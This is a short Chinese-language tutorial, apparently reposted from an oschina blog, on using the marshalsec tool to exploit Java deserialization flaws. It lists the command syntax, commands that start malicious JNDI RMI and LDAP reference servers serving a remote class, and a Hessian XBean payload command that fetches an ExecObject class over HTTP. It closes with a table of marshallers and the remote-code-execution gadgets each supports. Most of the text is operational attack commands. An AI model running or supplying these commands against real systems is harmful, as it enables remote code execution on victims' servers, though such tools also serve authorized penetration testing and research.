工具下载
marshalsec-0.3.0.3-SNAPSHOT-all.jar下载
下载地址:https://download.csdn.net/download/Fly_hps/12409277
工具使用
命令格式
marshalsec命令格式如下:
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
参数说明:
- -a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin)
- -t:对生成的payloads进行解码测试
- -v:verbose mode, 展示生成的payloads
- gadget_type:指定使用的payload
- arguments - payload运行时使用的参数
- marshalsec.<marshaller>:指定exploits,根目录下的java文件名
开启RMI服务
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1/css/#ExportObject 1099
开启LDAP服务
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1/css/#ExportObject 1389
查询可用Gadget
java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson //以Jackson为例
生成特定Payload
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.Hessian -v XBean http://127.0.0.1:8080/ExecObject
攻击载荷
目前marshalsec支持的exploit和payload有:
| Marshaller | Gadget Impact |
|---|---|
| BlazeDSAMF(0|3|X) | JDK only escalation to Java serialization various third party libraries RCEs |
| Hessian|Burlap | various third party RCEs |
| Castor | dependency library RCE |
| Jackson | possible JDK only RCE, various third party RCEs |
| Java | yet another third party RCE |
| JsonIO | JDK only RCE |
| JYAML | JDK only RCE |
| Kryo | third party RCEs |
| KryoAltStrategy | JDK only RCE |
| Red5AMF(0|3) | JDK only RCE |
| SnakeYAML | JDK only RCEs |
| XStream | JDK only RCEs |
| YAMLBeans | third party RCE |
来源:oschina
链接:https://my.oschina.net/u/4396695/blog/4275389